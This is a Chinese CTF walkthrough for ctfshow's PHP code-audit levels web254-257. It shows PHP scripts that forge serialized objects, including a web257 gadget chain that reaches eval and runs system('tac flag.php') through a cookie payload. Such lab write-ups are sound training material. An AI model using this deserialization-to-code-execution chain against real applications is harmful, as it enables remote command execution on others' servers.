CTFSHOW代码审计模块wp

发布于:2024-03-31 ⋅ 阅读:(81) ⋅ 点赞:(0)

web254

username=xxxxxx&password=xxxxxx

web255

<?php
class ctfShowUser{
	public $isVip=true;
}
var_dump(serialize(new ctfShowUser()));
?>
运行结果:
string(39) "O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}"
抓包添加信息
/?username=xxxxxx&password=xxxxxx
cookie:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}"

web256

<?php
class ctfShowUser{
	public $isVip=true;
	public $username='anything';
}
var_dump(serialize(new ctfShowUser()));
?>
运行结果为:
string(69) "O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}"
编码对象以及结果如下:
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}
O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22anything%22%3B%7D
Get形传参:
?username=anything&password=xxxxxx

web257

class ctfShowUser{
  	#无关紧要的值可以删去
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
  	#用到了,但是值可以进行变化
    private $class = 'info';
  	#构造方法,创建对象时自动调用此类方法,适合在使用对象时候做一些初始化操作
    public function __construct(){
      	#因为执行代码在blackDoor函数,这儿可以更换成其他函数
        $this->class=new info();
    }
  	#不能序列化
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
  	#对象销毁时自动调用,无关紧要
    public function __destruct(){
        $this->class->getInfo();
    }

}
#没有用到,可以删去
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
#利用到的类
class backDoor{
  	#这儿可以对code进行控制
    private $code;
  	#方法不能被序列化,删去
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
#最终代码如下,有个urlencode函数对生成的数组进行加密,因为序列化后会产生%00的截断符号,
#导致不能完整的复制
<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}

class backDoor{
    private $code='system("tac flag.php");';
    # 要执行的命令
}
var_dump(urlencode(serialize(new ctfShowUser())));
?>

运行结果如下:

string(201) "O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D"

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布